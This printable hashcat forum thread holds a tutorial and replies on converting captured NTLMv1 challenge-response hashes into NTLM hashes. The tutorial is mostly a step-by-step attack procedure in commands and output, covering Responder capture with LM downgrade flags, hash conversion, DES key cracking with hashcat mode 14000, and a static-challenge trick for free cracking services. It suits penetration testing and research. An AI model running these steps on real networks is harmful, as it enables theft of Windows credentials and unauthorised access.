NTLMv1 to NTLM Reversing - Printable Version +- hashcat Forum (https://hashcat.net/forum) +-- Forum: Misc (https://hashcat.net/forum/forum-15.html) +--- Forum: User Contributions (https://hashcat.net/forum/forum-25.html) +--- Thread: NTLMv1 to NTLM Reversing (/thread-9009.html) |
NTLMv1 to NTLM Reversing - evilmog - 03-03-2020 So I made life easy for the mode 14000 reversing NTLMv1 to NTLM both with and without SSP, I am adding this writeup on hashcat to save people time while searching for it. The original credit goes to atom for developing mode 14000 and his original writeups. ** All hashes in this writeup are synthetic and exist only in a lab machine, they are used for illustration purposes are in no way should you ever post hashes on the hashcat forums. I warrant that these did not come from a live production system or one where any kind of client or customer data every existed. First of all the link to the tool: https://github.com/evilmog/ntlmv1-multi Step 1, obtain a hash: Without SSP if LM is enabled Code: responder -I eth0 --lm -wrfFP Code: [SMB] NTLMv1 Client : 184.64.60.62 The hash portion looks like this: Code: hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788 Now if LM is disabled but NTLMv1 is still enabled as per https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level at a level of 2 then we have to contend with SSP: Code: responder -I eth0 -wrfFP The output looks like this: Code: [SMB] NTLMv1-SSP Client : 184.64.60.62 the SSP hash will look like this: Code: hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788 The important thing to notice is all the 0000000's in the lm portion of the hash. NTLMv1 looks like this username:blank:realmname/domainname:lm:nt:challenge The important part about SSP due to a lack of LM is that the Client challenge gets changed to an SRV Challenge....the python code for the srvchallenge looks like this: Code: if lmresp[20:48] == "0000000000000000000000000000": Step 2) we take our hash and we feed it to the NTLMv1 multi tool Code: python ntlmv1.py --ntlmv1 "hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788" Step 3) we create 14000.hash, thankfully the tool outputs the command to do this: Code: echo "892F905962F76D32:b36d2b9a8607ea77">>14000.hash Step 4) crack with hashcat, that being said I already know the output, this will take about 3 days on 32 GTX 1080's ish or so, so in order to verify I have nothing up my sleeve there is a tool in the repo that converts NTLM keys to DES keys Code: python ntlm-to-des.py --ntlm 8846f7eaee8fb117ad06bdd830b7586c We now run the echo commands it spit out, as well as the commands for the 14000.hash creation and actually crack with hashcat: Code: evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ echo '$HEX[8923bdfdaf753f63]'>>des.cand step 5) convert the des keys to ntlm Code: evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ ~/git/hashcat-utils/src/deskey_to_ntlm.pl 8923bdfdaf753f63 step 6) calculate ct3 Code: ~/git/hashcat-utils/src/./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 1122334455667788 85D5BC2CE95161CD00000000000000000000000000000000 alternatively you can swap out 1122334455667788 for the newly calculated SRV Challenge Code: ~/git/hashcat-utils/src/./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 b36d2b9a8607ea77 step 7) stitch them together: 8846f7eaee8fb1 17ad06bdd830b7 586c step 8) verification to prove this all works: Code: echo -n password | iconv -f utf8 -t utf16le | openssl dgst -md4 Step 9) be lazy and use the crack.sh tokens provided and pay $ to crack or use the 1122334455667788 challenge if you can get a solid LM RE: NTLMv1 to NTLM Reversing - hasherdasher - 03-03-2020 You are my hero.. Thank you for this.. RE: NTLMv1 to NTLM Reversing - evilmog - 03-04-2020 Btw I realized there was an error in my DES KEY generation part of the post, the corrected execution is here: Code: evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ python ntlm-to-des.py --ntlm 8846f7eaee8fb117ad06bdd830b7586c RE: NTLMv1 to NTLM Reversing - DanielG - 03-04-2020 Also check out https://crack.sh/netntlm/, they crack NTLMv1 to NTLM for free fast if you set responder to the static challenge of 1122334455667788 RE: NTLMv1 to NTLM Reversing - evilmog - 03-13-2020 (03-04-2020, 10:10 AM)DanielG Wrote: Also check out https://crack.sh/netntlm/, they crack NTLMv1 to NTLM for free fast if you set responder to the static challenge of 1122334455667788 Yep and they reference my multi tool as listed in this post: https://crack.sh/cracking-ntlmv1-w-ess-ssp/ Also my tool outputs crack.sh tokens RE: NTLMv1 to NTLM Reversing - m1ck3yb33 - 05-30-2024 what happens if responder gives me a hash like this? what the examples show: username::hostname:response:response:challenge what my hash looks like: username::hostname:challenge:response:response |